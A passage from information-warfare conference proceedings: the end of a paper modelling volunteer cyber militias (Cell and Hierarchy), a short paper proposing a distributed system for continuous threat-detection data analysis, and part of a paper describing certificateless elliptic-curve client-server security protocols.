generic term hacker is used to encompass all manner of people who perform cyber attacks on their<br />
own, regardless of their background, motivation and skill level. It includes the hackers, crackers and<br />
script kiddies described by Young and Aitel (2004). The hacker cell includes several hackers who<br />
commit cyber attacks on a regular basis over extended periods of time. Examples of hacker cells are<br />
Team Evil and Team Hell, as described in Carr (2009).<br />
3.1 Attributes<br />
Unlike the Forum, the Cell members are likely to know each other in real life, while remaining<br />
anonymous to the outside observer. Since their activities are almost certainly illegal, they need to trust<br />
each other. This limits the size of the group and requires a (lengthy) vetting procedure for any new<br />
recruits. The vetting procedure can include proof of illegal cyber attacks.<br />
The command and control structure of the Cell can vary from a clear self-determined hierarchy to a<br />
flat organization, where members coordinate their actions, but do not give or receive orders. In theory,<br />
several Cells can coordinate their actions in a joint campaign, forming a confederation of hacker cells.<br />
The Cells can exist for a long period of time, in response to a long-term problem, such as the Israel-<br />
Palestine conflict. The activity of such a Cell ebbs and flows in accordance with the intensity of the<br />
underlying conflict. The Cell may even disband for a period of time, only to reform once the situation<br />
intensifies again.<br />
Since hacking is a hobby (potentially a profession) for the members, they are experienced with the<br />
use of cyber attacks. One of the more visible types of attacks that can be expected from a Cell is the<br />
website defacement. Defacement refers to the illegal modification of website content, which often<br />
includes a message from the attacker, as well as the attacker’s affiliation. The Zone-H web archive<br />
309
Rain Ottis<br />
lists thousands of examples of such activity, as reported by the attackers. Many of the attacks are<br />
clearly politically motivated and identify the Cell that is responsible.<br />
Some members of the Cell may be involved with cyber crime. For example, the development,<br />
dissemination, maintenance and use of botnets for criminal purposes. These resources can be used<br />
for politically motivated cyber attacks on behalf of the Cell.<br />
3.2 Strengths<br />
A benefit of the Cell model is that it can mobilize very quickly, as the actors presumably already have<br />
each other’s contact information. In principle, the Cell can mobilize within minutes, although it likely<br />
takes hours or days to complete the process.<br />
A Cell is quite resistant to infiltration, because the members can be expected to establish their hacker<br />
credentials before being allowed to join. This process may include proof of illegal attacks.<br />
Since the membership can be expected to be experienced in cyber attack techniques, the Cell can be<br />
quite effective against unhardened targets. However, hardened targets may or may not be within the<br />
reach of the Cell, depending on their specialty and experience. Prior hacking experience also allows<br />
them to cover their tracks better, should they wish to do so.<br />
3.3 Weaknesses<br />
While a Cell model is more resistant to countermeasures than the Forum model, it does offer potential<br />
weaknesses to exploit. The first opportunity for exploitation is the hacker’s ego. Many of the more<br />
visible attacks, including defacements, leave behind the alias or affiliation of the attacker, in order to<br />
claim the bragging rights. (Carr 2009) This seems to indicate that they are quite confident in their skills<br />
and proud of their achievements. As such, they are potentially vulnerable to personal attacks, such as<br />
taunting or ridiculing in public. Stripping the anonymity of the Cell may also work, as at least some<br />
members could lose their job and face law enforcement action in their jurisdiction. (Carr 2009) As<br />
described by Ottis (2010b), it is probably not necessary to actually identify all the members of the Cell.<br />
Even if the identity of a few of them is revealed or if the corresponding perception can be created<br />
among the membership, the trust relationship will be broken and the effectiveness of the group will<br />
decrease.<br />
Prior hacking experience also provides a potential weakness. It is more likely that the law<br />
enforcement know the identity of a hacker, especially if he or she continues to use the same affiliation<br />
or hacker alias. While there may not be enough evidence or damage or legal base for law<br />
enforcement action in response to their criminal attacks, the politically motivated attacks may provide<br />
a different set of rules for the local law enforcement.<br />
The last problem with the Cell model is scalability. There are only so many skilled hackers who are<br />
willing to participate in a politically motivated cyber attack. While this number may still overwhelm a<br />
small target, it is unlikely to have a strong effect on a large state.<br />
4. The hierarchy<br />
The third option for organizing a volunteer force is to adopt a traditional hierarchical structure. This<br />
approach is more suitable for government sponsored groups or other cohesive groups that can agree<br />
to a clear chain of command. For example, the People’s Liberation Army of China is known to include<br />
militia type units in their IW battalions. (Krekel 2009) The model can be divided into two generic submodels:<br />
anonymous and identified membership.<br />
4.1 Attributes<br />
The Hierarchy model is similar in concept to military units, where a unit commander exercises power<br />
over a limited number of sub-units. The number of command levels depends on the overall size of the<br />
organization.<br />
Each sub-unit can specialize on some specific task or role. For example, the list of sub-unit roles can<br />
include reconnaissance, infiltration/breaching, exploitation, malware/exploit development and training.<br />
Depending on the need, there can be multiple sub-units with the same role. Consider the analogy of<br />
310
Rain Ottis<br />
an infantry battalion, which may include a number of infantry companies, anti-tank and mortar<br />
platoons, a reconnaissance platoon, as well as various support units (communications, logistics), etc.<br />
This specialization and role assignment allows the militia unit to conduct a complete offensive cyber<br />
operation from start to finish.<br />
A Hierarchy model is the most likely option for a state sponsored entity, since it offers a more<br />
formalized and understandable structure, as well as relatively strong command and control ability. The<br />
control ability is important, as the actions of a state sponsored militia are by definition attributable to<br />
the state.<br />
However, a Hierarchy model is not an automatic indication of state sponsorship. Any group that is<br />
cohesive enough to determine a command structure amongst them can adopt a hierarchical structure.<br />
This is very evident in Massively Multiplayer Online Games (MMOG), such as World of Warcraft or<br />
EVE Online, where players often form hierarchical groups (guilds, corporations, etc.) in order to<br />
achieve a common goal. The same approach is possible for a cyber militia as well. In fact, Williams<br />
(2007) suggests that gaming communities can be a good recruiting ground for a cyber militia.<br />
While the state sponsored militia can be expected to have identified membership (still, it may be<br />
anonymous to the outside observer) due to control reasons, a non-state militia can consist of<br />
anonymous members that are only identified by their screen names.<br />
4.2 Strengths<br />
The obvious strength of a hierarchical militia is the potential for efficient command and control. The<br />
command team can divide the operational responsibilities to specialized sub-units and make sure that<br />
their actions are coordinated. However, this strength may be wasted by incompetent leadership or<br />
other factors, such as overly restrictive operating procedures.<br />
A hierarchical militia may exist for a long time even without ongoing conflict. During “peacetime“, the<br />
militia’s capabilities can be improved with recruitment and training. This degree of formalized<br />
preparation with no immediate action in sight is something that can set the hierarchy apart from the<br />
Forum and the Cell.<br />
If the militia is state sponsored, then it can enjoy state funding, infrastructure, as well as cooperation<br />
from other state entities, such as law enforcement or intelligence community. This would allow the<br />
militia to concentrate on training and operations.<br />
4.3 Weaknesses<br />
A potential issue with the Hierarchy model is scalability. Since this approach requires some sort of<br />
vetting or background checks before admitting a new member, it may be time consuming and<br />
therefore slow down the growth of the organization.<br />
Another potential issue with the Hierarchy model is that by design there are key persons in the<br />
hierarchy. Those persons can be targeted by various means to ensure that they will not be effective or<br />
available during a designated period, thus diminishing the overall effectiveness of the militia. A<br />
hierarchical militia may also have issues with leadership if several people contend for prestigious<br />
positions. This potential rift in the cohesion of the unit can potentially be exploited by infiltrator agents.<br />
Any activities attributed to the state sponsored militia can further be attributed to the state. This puts<br />
heavy restrictions on the use of cyber militia “during peacetime“, as the legal framework surrounding<br />
state use of cyber attacks is currently unclear. However, in a conflict scenario, the state attribution is<br />
likely not a problem, because the state is party to the conflict anyway. This means that a state<br />
sponsored offensive cyber militia is primarily useful as a defensive capability between conflicts. Only<br />
during conflict can it be used in its offensive role.<br />
While a state sponsored cyber militia may be more difficult (but not impossible) to infiltrate, they are<br />
vulnerable to public information campaigns, which may lead to low public and political support,<br />
decreased funding and even official disbanding of the militia. On the other hand, if the militia is not<br />
state sponsored, then it is prone to infiltration and internal information operations similar to the one<br />
considered at the Forum model.<br />
311
Rain Ottis<br />
Of the three models, the hierarchy probably takes the longest to establish, as the chain of command<br />
and role assignments get settled. During this process, which could take days, months or even years,<br />
the militia is relatively inefficient and likely not able to perform any complex operations.<br />
5. Comparison<br />
When analyzing the three models, it quickly becomes apparent that there are some aspects that are<br />
similar to all of them. First, they are not constrained by location. While the Forum and the Cell are by<br />
default dispersed, even a state sponsored hierarchical militia can operate from different locations.<br />
Second, since they are organizations consisting of humans, then one of the more potent ways to<br />
neutralize cyber militias is through information operations, such as persuading them that their<br />
identities have become known to the law enforcement, etc.<br />
Third, all three models benefit from a certain level of anonymity. However, this also makes them<br />
susceptible for infiltration, as it is difficult to verify the credentials and intent of a new member.<br />
On the other hand, there are differences as well. Only one model lends itself well to state sponsored<br />
entities (hierarchy), although, in principle, it is possible to use all three approaches to bolster the<br />
state’s cyber power.<br />
The requirement for formalized chain of command and division of responsibilities means that the initial<br />
mobilization of the Hierarchy can be expected to take much longer than the more ad-hoc Forum or<br />
Cell. In case of short conflicts, this puts the Hierarchy model at a disadvantage.<br />
Then again, the Hierarchy model is more likely to adopt a “peace time” mission of training and<br />
recruitment in addition to the “conflict” mission, while the other two options are more likely to be<br />
mobilized only in time of conflict. This can offset the slow initial formation limitation of the Hierarchy, if<br />
the Hierarchy is established well before the conflict.<br />
While the Forum can rely on their numbers and use relatively primitive attacks, the Cell is capable of<br />
more sophisticated attacks due to their experience. The cyber attack capabilities of the Hierarchy,<br />
however, can range from trivial to complex.<br />
It is important to note that the three options covered here can be combined in many ways, depending<br />
on the underlying circumstances and the personalities involved.<br />
Conclusion<br />
Politically motivated cyber attacks are becoming more frequent every year. In most cases the cyber<br />
conflicts include offensive non-state actors (spontaneously) formed from volunteers. Therefore, it is<br />
important to study these groups.<br />
I have provided a theoretical way to categorize non-trivial cyber militias based on their organization.<br />
The three theoretical models are: the Forum, the Cell and the Hierarchy. In reality, it is unlikely to see<br />
a pure form of any of these, as different groups can include aspects of several models. However, the<br />
strengths and weaknesses identified should serve as useful guides to dealing with the cyber militia<br />
threat.<br />
Disclaimer: The opinions expressed here should not be interpreted as the official policy of the<br />
Cooperative Cyber Defence Centre of Excellence or the North Atlantic Treaty Organization.<br />
References<br />
Carr, J. (2009) Inside Cyber Warfare. Sebastopol: O'Reilly Media.<br />
Denning, D. E. (2010) “Cyber Conflict as an Emergent Social Phenomenon.” In Holt, T. & Schell, B. (Eds.)<br />
Corporate Hacking and Technology-Driven Crime: Social Dynamics and Implications. IGI Global, pp 170-<br />
186.<br />
Krekel, B., DeWeese, S., Bakos, G., Barnett, C. (2009) Capability of the People’s Republic of China to Conduct<br />
Cyber Warfare and Computer Network Exploitation. Report for the US-China Economic and Security<br />
Review Commission.<br />
Nazario, J. (2009) “Politically Motivated Denial of Service Attacks.” In Czosseck, C. & Geers, K. (Eds.) The Virtual<br />
Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press, pp 163-181.<br />
312
Rain Ottis<br />
Ottis, R. (2008) “Analysis of the 2007 Cyber Attacks Against Estonia from the Information Warfare Perspective.”<br />
In Proceedings of the 7th <strong>European</strong> <strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong><br />
Publishing Limited, pp 163-168.<br />
Ottis, R. (2009) ”Theoretical Model for Creating a Nation-State Level Offensive Cyber Capability.” In Proceedings<br />
of the 8th <strong>European</strong> <strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong> Publishing<br />
Limited, pp 177-182.<br />
Ottis, R. (2010a) “From Pitch Forks to Laptops: Volunteers in Cyber Conflicts.” In Czosseck, C. and Podins, K.<br />
(Eds.) <strong>Conference</strong> on Cyber Conflict. Proceedings 2010. Tallinn: CCD COE Publications, pp 97-109.<br />
Ottis, R. (2010b) “Proactive Defence Tactics Against On-Line Cyber Militia.” In Proceedings of the 9th <strong>European</strong><br />
<strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong> Publishing Limited, pp 233-237.<br />
Williams, G., Arreymbi, J. (2007) Is Cyber Tribalism Winning Online Information Warfare? In Proceedings of<br />
ISSE/SECURE 2007 Securing Electronic Business Processes. Wiesbaden: Vieweg. On-line:<br />
http://www.springerlink.com/content/t2824n02g54552m5/n<br />
Young, S., Aitel, D. (2004) The Hacker’s Handbook. The Strategy behind Breaking into and Defending Networks.<br />
Boca Raton: Auerbach.<br />
313
314
Work<br />
in<br />
Progress<br />
Papers<br />
315
316
Large-Scale Analysis of Continuous Data in Cyber-Warfare<br />
Threat Detection<br />
William Acosta<br />
University of Toledo, USA<br />
william.acosta@utoledo.edu<br />
Abstract: Combating cyber/information warfare threats requires analyzing vast quantities of diverse data. The<br />
data required to detect attacks as they occur (on-line analysis of live data) and predict future threats (forensic<br />
analysis/data mining) is not only large, but is growing at a staggering rate. Data such as network traffic logs,<br />
emails, and social networking posts, SMS message, and cell phone call logs are, by nature, continuous and<br />
growing. The problem addressed in this research is that current systems are not designed to handle either the<br />
scope or nature of the analysis or the data itself. For example, distributed data processing systems like Google’s<br />
Map-Reduce provide the ability to process large data sets, but they are not designed to easily support processing<br />
of changing data sets or data-mining algorithms. In light of this, Google has itself recently stopped using<br />
MapReduce for building its web-index, opting instead for a custom mechanism that can more quickly respond to<br />
and process new content. Non-traditional databases, like vertically-partitioned/column-store databases, can<br />
efficiently support analysis algorithms on large quantities of data, but they are not designed to support<br />
continuously changing data sets. The goal of this research is to explore and design new data management<br />
system that can handle large quantities of incrementally growing data as well as direct support for data mining<br />
and analysis algorithms. Specifically, this research proposes a new distributed data processing system that<br />
exploits the parallel and distributed resources/computation of cloud computing infrastructures. It makes use of<br />
summary data structures that can be updated incrementally and continuous queries to support analysis and data<br />
mining algorithms natively. This approach allows for larger-scale and more robust analysis on continuously<br />
growing data that can help detect, predict and respond to cyber-warfare threats.<br />
Keywords: data-mining, databases, text-search, cloud computing, data integration<br />
1. Introduction<br />
Protection against cyber/information warfare threats requires understanding the nature, methods, and<br />
patterns of those attacks. Such understanding can allow for early detection and, possibly prediction,<br />
of attacks. Gaining an understanding of the patterns and mechanisms used in cyber/information<br />
warfare attacks requires analyzing large amounts of diverse data such as server logs (Myers et al.<br />
2010), emails, SMS messages, and social-networking data. Not only is the data diverse, but it is also<br />
continuous; new data gets generated every day. Furthermore, analysis of this data can require<br />
equally diverse approaches: graph-theoretic algorithms (detecting patterns in social-networking), data<br />
mining algorithms (associations between events), statistical models, clustering algorithms, etc. The<br />
diverse nature of the data and analysis algorithms as well as the large quantity of data to be analyzed<br />
poses problems to both traditional databases and storage systems. In order to provide the analysis of<br />
diverse and continuous data required for cyber-warfare threat detection, a new system is needed for<br />
managing large quantities of diverse data that can support equally diverse analysis algorithms.<br />
The need to incrementally process large quantities of data is applicable to wide range of applications.<br />
For example, Google replaced MapReduce (Dean & Ghemawat 2004), its current web-indexing<br />
system, in order to enable faster updates of its index (Metz 2010, Peng & Dabek 2010). Similarly,<br />
detecting and responding to information security threats requires a mechanism that cannot only<br />
manage large quantities of data, but also provide for fast response time of complex, continuous<br />
analysis. This paper proposes a new distributed data-analysis framework that is designed to meet the<br />
needs of applications that require analysis of continuous data. Next, Section 2 presents the design of<br />
the proposed system in the context of related work. Section 3 then provides concluding remarks.<br />
2. Design and requirements of a continuous data analysis system<br />
Cyber-warfare threat detection requires analyzing large quantities of diverse data that is continuously<br />
generated. The properties of the raw data in this type of application impose some constraints on the<br />
analysis and data storage systems. These applications require analyzing not only current data, but<br />
also prior/historical from many heterogeneous sources. Because the raw data is continuously<br />
generated, old data must be kept for analysis while new data is integrated into the storage and<br />
analysis framework. Because old data must be kept and not changed, the system need not support<br />
updates of raw data. Effectively, raw data is append-only. This can be leveraged to improve storage<br />
efficiency and performance; it is easier to implement and support distributed storage as no write-<br />
317
William Acosta<br />
locking of existing data is necessary. It also allows for the analysis framework to make use novel<br />
summary data structures and algorithms that can incorporate the changes made to the data without<br />
requiring analysis of the full dataset.<br />
2.1 Storage and data management<br />
The large quantity of data makes a centralized storage solution unfeasible; instead, a distributed<br />
storage solution Is favored. The parallel nature of many of the algorithms makes a distributed solution<br />
not only more feasible, but also desirable. Distributed storage systems such as Google’s BigTable<br />
(Chang et al. 2006), Yahoo’s PNUTS (Cooper et al. 2008), and Amazon’s Dynamo (DeCandia et al.<br />
2007) provide the low-level mechanisms for storing, and managing large quantities of data. These<br />
systems were designed to support coordinated reads and updates of data in a distributed<br />
environment. To support the needs of applications like cyber-warfare threat detection, a distributed<br />
storage system should provide efficient, low-level support for append-only writes of raw data, as well<br />
as efficient tracking of incremental additions and updates of the dataset.<br />
2.2 Distributed processing of data<br />
Recently, there has been a great deal of research in Google’s MapReduce (Dean & Ghemawat 2004)<br />
distributed computing software framework for processing large datasets. However, its batch-oriented<br />
nature was not designed to deal with incremental or continuous data updates. This makes it<br />
unsuitable for a variety of applications including cyber-warfare threat analysis and detection. Systems<br />
like Haloop (Bu et al. 2010) and MapReduce Online (Condie et al. 2010) have sought to add<br />
continuous query support to MapReduce. To achieve this, these systems had to make fundamental<br />
changes to the API and underlying architecture of MapReduce. This paper argues that what is<br />
needed instead is a system designed from the ground-up to support the demands of analysis and<br />
mining algorithms on large sets of continuously generated data.<br />
2.3 Data management and analysis<br />
The problem of analyzing continuous data has been explored by stream databases (Abadi et al. 2005,<br />
Shah et al. 2004). Similarly, continuous queries in databases have been proposed with systems such<br />
as TelegraphCQ (Chandrasekaran et al. 2003) and CQL (Arasu et al. 2006). These systems can<br />
handle processing queries on streams of data with long-running/continuous queries. However, they<br />
lack the ability to support analytic algorithms over a large and diverse dataset. In contrast, verticallypartitioned<br />
databases such as C-Store (Stonebraker et al. 2005) excel at fast and efficient support of<br />
complex analytics. Unfortunately, vertically-partitioned databases suffer from poor performance on<br />
writes. In essence, insertions and updates require that the index be rebuilt. Although performance of<br />
reads is very fast once the index is built, building the index is very expensive. What is needed is a<br />
system that can perform complex analytics on continuous data without requiring a complex index to<br />
be completely rebuilt as a result of data updates. This paper proposes a new, incremental indexing<br />
system that keeps track of summarized historical data while allowing for many small [incremental]<br />
updates to be incorporated. The key difference is that, unlike traditional database indexes, the new<br />
incremental index would not be build off-line (batch-process). Instead, the index would incorporate the<br />
many incremental updates on-line so that the index of past data is always active and valid.<br />
In addition to the storage and distributed computing framework, it is also important to consider the<br />
needs of the algorithms that will be used in the system. Applications with such diverse data require<br />
equally diverse analysis. For example, detecting hidden correlations and associations between events<br />
seen in server logs requires mining association rules (Agrawal & Srikant 1994) whereas detecting<br />
interaction of attackers in a network may involve graph theoretic algorithms.<br />
3. Conclusion<br />
This paper presents a case for a new distributed computing system that is explicitly designed to meet<br />
the unique needs of applications such as cyber-warfare threat detection. The system should support<br />
large quantities of diverse data such as server logs, emails, social-network data, etc. It should allow<br />
for a variety of mining and analysis algorithms and support for those algorithms to be processed in a<br />
parallel and distributed manner. The system must not only meet these needs, but also do so in a way<br />
that can efficiently support continuous analysis of data that is continuously generated.<br />
318
References<br />
William Acosta<br />
Abadi, D. J., Ahmad, Y., Balazinska, M., Cherniack, M., hyon Hwang, J., Lindner, W., Maskey, A. S., Rasin, E.,<br />
Ryvkina, E., Tatbul, N., Xing, Y. & Zdonik, S. (2005), The design of the borealis stream processing engine,<br />
in ‘CIDR ’05: Proceedings of the second biennial <strong>Conference</strong> on Innovative Data Systems Research’, pp.<br />
277–289.<br />
Agrawal, R. & Srikant, R. (1994), Fast algorithms for mining association rules, in J. B. Bocca, M. Jarke & C.<br />
Zaniolo, eds, ‘Proc. 20th Int. Conf. Very Large Data Bases, VLDB’, Morgan Kaufmann, pp. 487–499.<br />
Arasu, A., Babu, S. & Widom, J. (2006), ‘The cql continuous query language: semantic foundations and query<br />
execution’, The VLDB Journal 15(2), 121–142.<br />
Bu, Y., Howe, B., Balazinska, M. & Ernst, M. D. (2010), Haloop: Efficient iterative data processing on large<br />
clusters, in ‘Proceedings of the VLDB Endowment’, Vol. 3.<br />
Chandrasekaran, S., Cooper, O., Deshpande, A., Franklin, M. J., Hellerstein, J. M., Hong, W., Krishnamurthy, S.,<br />
Madden, S., Raman, V., Reiss, F. & Shah, M. (2003), Telegraphcq: Continuous dataflow processing for an<br />
uncertain world, in ‘CIDR ’03: Proceedings of the first biennial <strong>Conference</strong> on Innovative Data Systems<br />
Research’.<br />
Chang, F., Dean, J., Ghemawat, S., Hsieh, W. C., Wallach, D. A., Burrows, M., Chandra, T., Fikes, A. & Gruber,<br />
R. E. (2006), Bigtable: A distributed storage system for structured data, in ‘Proceedings of the 7th<br />
symposium on Operating systems design and implementation (OSDI ’06)’, Seattle, WA.<br />
Condie, T., Conway, N., Alvaro, P., Elmeleegy, J. M. H. K. & Sears, R. (2010), Mapreduce online, in<br />
‘Proceedings of the Seventh USENIX Symposium on Networked System Design and Implementation (NSDI<br />
2010)’, San Jose, CA.<br />
Cooper, B. F., Ramakrishnan, R., Srivastava, U., Silberstein, A., Bohannon, P., arno Jacobsen, H., Puz, N.,<br />
Weaver, D. & Yerneni, R. (2008), Pnuts: Yahoo!s hosted data serving platform, in ‘Proceedings of the 34th<br />
International <strong>Conference</strong> on Very Large Data Bases (VLDB ’08)’, Auckland, New Zealand.<br />
Dean, J. & Ghemawat, S. (2004), Mapreduce: simplified data processing on large clusters, in ‘OSDI’04:<br />
Proceedings of the <strong>6th</strong> conference on Symposium on Operating Systems Design & Implementation’,<br />
USENIX Association, Berkeley, CA, USA, pp. 10–10.<br />
DeCandia, G., Hastorun, D., Jampani, M., Kakulapati, G., Lakshman, A., Pilchin, A., Sivasubramanian, S.,<br />
Vosshall, P. & Vogels, W. (2007), Dynamo: amazon’s highly available key-value store, in ‘SOSP ’07:<br />
Proceedings of twenty-first ACM SIGOPS symposium on Operating systems principles’, ACM, New York,<br />
NY, USA, pp. 205–220.<br />
Metz, C. (2010), ‘Google search index splits with mapreduce’. URL: http: // www. theregister. co. uk/ 2010/ 09/<br />
09/ google_ caffeine_ explained/<br />
Myers, J., Grimaila, M. & Mills, R. (2010), Insider threat detection using distributed event correlation of web<br />
server logs, in ‘ICIW ’10: Proceedings of the 5th International <strong>Conference</strong> on Information-Warfare and<br />
Security’.<br />
Peng, D. & Dabek, F. (2010), Large-scale incremental processing using distributed transactions and notifications,<br />
in ‘OSDI ’10: Proceedings of the Ninth USENIX Symposium on Operating Systems Design and<br />
Implementation’.<br />
Shah, M. A., Hellerstein, J. M. & Brewer, E. (2004), Highly available, fault-tolerant, parallel dataflows, in<br />
‘SIGMOD ’04: Proceedings of the 2004 ACM SIGMOD international conference on Management of data’,<br />
ACM, New York, NY, USA, pp. 827–838.<br />
Stonebraker, M., Abadi, D. J., Batkin, A., Chen, X., Cherniack, M., Ferreira, M., Lau, E., Lin, A., Madden, S.,<br />
O’Neil, E., O’Neil, P., Rasin, A., Tran, N. & Zdonik, S. (2005), C-store: a column-oriented dbms, in ‘VLDB<br />
’05: Proceedings of the 31st international conference on Very large data bases’, VLDB Endowment, pp.<br />
553–564.<br />
319
A System and Method for Designing Secure Client-Server<br />
Communication Protocols Based on Certificateless PKI<br />
Natarajan Vijayarangan<br />
Tata Consultancy Services Limited (TCS), Chennai, India<br />
n.vijayarangan@tcs.com<br />
Abstract: Client-server networking is a distributed application architecture that partitions tasks or work loads<br />
between service providers (servers) and service requesters (clients), where the network communication is not<br />
necessarily secure. A number of researchers and organizations have produced innovative methods to ensure a<br />
secure communication in the client-server set up. However, in this paper, TCS has brought out a system of novel<br />
network security protocols for a generic purpose. Let us take a look into the brief history of client-server<br />
communication. In 1993 Bollovin and Merritte patented a strong Password-based Authentication Key Exchange<br />
(PAKE), an interactive method for two or more parties to establish cryptographic keys based on one or more<br />
party's knowledge of a password. Later, Standford University patented Secure Remote Protocol (SRP) used for a<br />
new password authentication and key-exchange mechanism over an untrusted network. Then Sun Microsystems<br />
implemented the Elliptic Curve Cryptography (ECC) technology which is well integrated into the OpenSSL-<br />
Certificate Authority. This code enables secure TLS/SSL handshakes using the Elliptic curve based cipher suites.<br />
In this paper, we proposed a set of client-server communication protocols using certificateless Public Key<br />
Infrastructure (PKI) based on ECC. Then the protocols have identity based authentication without using bilinear<br />
maps, session key exchange and secure message transfer. Moreover, we showed that the protocols are<br />
lightweight and are designed to serve multiple applications.<br />
Keywords: certificateless public key cryptography, elliptic curve cryptography, jacobi identity, message<br />
preprocessing, lie algebras, challenge-response<br />
1. Introduction<br />
In the existing network operating systems, communication between the client and server takes place<br />
using File Transfer Protocol mode which is not a secure medium. The more secure medium for<br />
communication, Hypertext Transfer Protocol Secure, also does not ensure the security of messages,<br />
but the connection. For instance, some of the problems that users access with a set-top box unit<br />
would be data loss, content modification and so on. TCS has designed a set of novel network security<br />
protocols to avoid these issues and ensure robust communication between the client and server.<br />
Theoretically and practically, the proposed protocols have been analyzed that these protocols are<br />
secure against replay and rushing attacks. In this design, the certificateless PKI concept based on<br />
ECC (Al-Riyami and Paterson 2003, Hankerson et al 2004) is introduced to strengthen the protocols.<br />
Hence TCS filed up a patent application for this invention.<br />
2. Objectives of the invention<br />
The objectives of the invention are to provide: 1) a secure communication between client and server<br />
2) a robust, tamper-proof and lightweight authentication mechanism, 3) non-repudiation for clients and<br />
4) no password-based negotiation between client and server.<br />
3. Overview of the invention<br />
In the existing network security protocols, certificate-based public key cryptography and Identitybased<br />
cryptography have been widely used. These Crypto methods face the costly and complex key<br />
management problem and the key escrow problem in the real-life deployment. A few years ago,<br />
Certificateless Public Key Cryptography (CL-PKC) was introduced to address these problems, which<br />
have not been solved fully. Sometimes, CL-PKC uses bilinear pairings (Adi Shamir 1984) and inverse<br />
operations which will slowdown the performance of authentication process.<br />
TCS' new approach towards the network security protocols will solve the common problems between<br />
customers and network service providers or agents. Many researchers and organizations have<br />
developed innovative client-server communication protocols based on certificates which require a lot<br />
of computation, power consumption and memory space. TCS has designed a lightweight protocol that<br />
will overcome these issues.<br />
TCS has introduced CL-PKC with no bilinear pairings in the proposed set of network security<br />
protocols. These protocols are efficient and effective against common attacks and have applications<br />
in client-server set up over Transmission Control Protocol and User Datagram Protocol networks, Set-<br />
320
Natarajan Vijayarangan<br />
top box units and Telecommunication. Hence the three different Network Security Protocols (NSP 1, 2<br />
and 3) that TCS has developed are explained in the following sections.<br />
4. Description of NSP 1<br />
TCS has designed a network security protocol in a generic manner to ensure secure communication<br />
between client and server. This protocol initially allows the server to act as a Key Generation Center<br />
(KGC) for distributing public and private keys to clients. Later, every client has to generate a pair of<br />
public and private keys for authentication and session key generation. No certificate is exchanged in<br />
this protocol. Robust and well-proven algorithms, ECDSA (Elliptic Curve Digital Signature Algorithm)<br />
and ECDH (Elliptic Curve Diffie-Hellman) Key Exchange (Certicom Research 2000), are used in this<br />
protocol for authentication and session key generation respectively.<br />
Following is the workflow of NSP1:<br />
(Pre-Shared Key Mechanism) Every client has a pair of Public and Private keys generated by the<br />
server which acts as a Key Generation Center (KGC).<br />
Client initiates the communication to server by sending a message ‘Client Hello!’.<br />
Server generates Random Challenge (RC) of n-bits using Pseudo Random Number Generator<br />
(PRNG). Further, Server encrypts RC with client's public key using Elliptic Curve Encryption<br />
(ECE) method.<br />
Client decrypts the encrypted RC with its private key using ECE.<br />
Client generates Public and Private keys on NIST Elliptic curve-256 / 384 /512. Client signs the<br />
challenge and sends the signature to Server.<br />
Server verifies the signature and generates a key pair on the SAME curve. Server sends its public<br />
key to Client.<br />
Client and server negotiate an m-bit shared secret key using ECDH algorithm.<br />
Client and server have Session key of m bits for Encryption. Client and server have a cipher suite.<br />
A secure communication is established between Client and Server.<br />
5. Description of NSP 2<br />
There is no initial set up on generating a pair of public and private keys for client and server for<br />
network security protocol 2. But the client and the server have a unique Message Preprocessing (MP)<br />
function (Vijayarangan 2009), a bijective mapping, which helps to ensure no modification taken place,<br />
when a random challenge has been sent in plain. As a part of communication setup, each client<br />
receives a unique MP function and ID (an Identity number of a client) supplied by the server. It is<br />
important to know that an MP algorithm (consisting of 3 operations in a sequential manner- Shuffling,<br />
T-function and LFSR) converts a message into a randomized message. It has been analyzed that<br />
NSP 2 stands better than NSP 1 due to an MP function if an attacker predicts RC values during the<br />
communication.<br />
Following is the workflow of NSP 2:<br />
Client initiates the communication to server by sending a message ‘Client Hello!’.<br />
Server generates Random Challenge (RC) of n-bits using Pseudo Random Number Generator<br />
(PRNG) and computes the message preprocessing of RC. Client receives the RC and MP(RC). It<br />
verifies MP(RC).<br />
Client generates Public and Private keys on NIST Elliptic curve-256 / 384 / 512. Client signs the<br />
message = {RC || ID} and sends the signature with its public key and MP(public key) to Server.<br />
Server verifies the signature and generates a key pair on the SAME curve. Server sends its public<br />
key to Client.<br />
321
Natarajan Vijayarangan<br />
Client and Server negotiate an m-bit shared secret key using ECDH algorithm.<br />
Client and Server have Session key of m bits for Encryption. Client and Server have a cipher<br />
suite.<br />
A secure communication is established between Client and Server.<br />
6. Description of NSP 3<br />
It is similar to Network security protocol 1 and the difference can be seen in Signature generation.<br />
Client uses Jacobi identity, a special product on Lie algebras [8], to authenticate server. The Jacobi<br />
identity (Jacobson 1979) performs on a random challenge RC = x || y ||z (divide into 3 parts -<br />
trifurcation) and satisfies the relationship [[x,y],z] + [[y,z],x] + [[z,x],y] = 0. It is important to know that<br />
Lie product (Lie bracket) has a special property: [x, y] = -[y, x].<br />
Following is the workflow of NSP 3:<br />
(Pre-Shared Key Mechanism) Every client has a pair of Public and Private keys generated by the<br />
server which acts as a Key Generation Center (KGC).<br />
Client initiates the communication to server by sending a message ‘Client Hello!’.<br />
Server generates Random challenge (RC) of n-bits using Pseudo Random Number Generator<br />
(PRNG). Further, Server encrypts RC with client's public key using Elliptic Curve Encryption<br />
(ECE) method.<br />
Client decrypts the encrypted RC with its private key using ECE.<br />
Client computes Jaboci identity on RC = x||y||z and sends the Lie product [[x,y],z] to server.<br />
Server verifies the relationship [[x,y],z] + [[y,z],x] + [[z,x],y] = 0. Server sends its public key using<br />
ECC to Client.<br />
Client and server negotiate an m-bit shared secret key using ECDH algorithm.<br />
Client and server have Session key of m bits for Encryption. Client and server have a cipher suite.<br />
A secure communication is established between Client and Server.<br />
7. Analysis<br />
The proposed network security protocols do not allow replay and rushing attacks. An attacker cannot<br />
guess a random challenge (RC) in NSP 1, since it traverses in an encrypted form. It is safe to use<br />
NSP 1 in different nodes/channels.<br />
Considering NSP 2 that is different from NSP 1 and sends RC in plain with MP(RC). It is interesting to<br />
see the notion of bijective property in MP where an attacker can change RC, but not MP(RC). Given<br />
two distinct random challenges RC1 and RC2, MP(RC1) is not the same as MP(RC2). If the attacker<br />
tries to insert another random challenge, then server could detect this fraud by verifying a client's<br />
signature. Since MP function has Shuffling, T-function and LFSR operations that are invertible<br />
